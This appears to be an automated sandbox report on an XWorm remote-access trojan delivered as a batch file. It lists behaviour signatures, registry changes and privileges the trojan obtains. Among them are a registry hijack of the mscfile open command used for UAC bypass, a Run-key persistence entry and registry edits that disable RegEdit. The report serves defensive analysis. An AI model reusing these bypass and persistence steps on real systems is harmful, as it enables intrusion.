Malware Analysis Report

2024-10-16 05:07

Sample ID 240727-29neqsxcmh
Target Uac Bypass Rat.bat
SHA256 a5414f82d063d24e7f0d7e417024ba796c6e52fcb07cd8e59c306fe0e05b7518
Tags
xworm defense_evasion discovery dropper evasion execution persistence rat trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

a5414f82d063d24e7f0d7e417024ba796c6e52fcb07cd8e59c306fe0e05b7518

Threat Level: Known bad

The file Uac Bypass Rat.bat was found to be: Known bad.

Malicious Activity Summary

Xworm

Detect Xworm Payload

Disables Task Manager via registry modification

Disables RegEdit via registry modification

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Disables use of System Restore points

Download via BitsAdmin

Drops startup file

Executes dropped EXE

Looks up external IP address via web service

Obfuscated Files or Information: Command Obfuscation

Deobfuscate/Decode Files or Information

Adds Run key to start application

Drops file in System32 directory

Drops file in Windows directory

Launches sc.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Suspicious use of AdjustPrivilegeToken

Uses Task Scheduler COM API

Modifies registry key

Suspicious use of WriteProcessMemory

Modifies registry class

Scheduled Task/Job: Scheduled Task

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: LoadsDriver

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-07-27 23:17

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-27 23:17

Reported

2024-07-27 23:27

Platform

win10-20240611-en

Max time kernel

563s

Max time network

602s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uac Bypass Rat.bat"

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Xworm

trojan rat xworm

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Disables RegEdit via registry modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" C:\Windows\SysWOW64\reg.exe N/A

Disables Task Manager via registry modification

evasion

Disables use of System Restore points

evasion

Download via BitsAdmin

dropper
Description Indicator Process Target
N/A N/A C:\Windows\system32\bitsadmin.exe N/A

Drops startup file

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Uni.lnk C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Uni.lnk C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000\Software\Microsoft\Windows\CurrentVersion\Run\Uni = "C:\\Users\\Admin\\Uni.exe" C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A

Deobfuscate/Decode Files or Information

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\certutil.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Obfuscated Files or Information: Command Obfuscation

defense_evasion

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\Recovery C:\Windows\SysWOW64\ReAgentc.exe N/A
File opened for modification C:\Windows\SysWOW64\Recovery\ReAgent.xml C:\Windows\SysWOW64\ReAgentc.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Logs\ReAgent\ReAgent.log C:\Windows\SysWOW64\ReAgentc.exe N/A
File opened for modification C:\Windows\Panther\UnattendGC\setuperr.log C:\Windows\SysWOW64\ReAgentc.exe N/A
File opened for modification C:\Windows\Panther\UnattendGC\diagerr.xml C:\Windows\SysWOW64\ReAgentc.exe N/A
File opened for modification C:\Windows\Panther\UnattendGC\diagwrn.xml C:\Windows\SysWOW64\ReAgentc.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\cknnzt.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\ReAgentc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (data) \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000007800000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\mscfile\shell C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\mscfile\shell\open\command\ = "cmd.exe /c reg delete HKCU\\Software\\Classes\\mscfile\\shell\\open\\command /f & C:\\Windows\\System32\\cmd.exe" C:\Windows\system32\reg.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\mscfile\shell\open\command C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupView = "0" C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1" C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Mode = "4" C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\IconSize = "16" C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1092616257" C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e80922b16d365937a46956b92703aca08af0000 C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1" C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\LogicalViewMode = "1" C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByDirection = "1" C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\mscfile C:\Windows\system32\reg.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656} C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\mscfile\shell\open C:\Windows\system32\reg.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Documents" C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:PID = "0" C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A

Runs net.exe

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
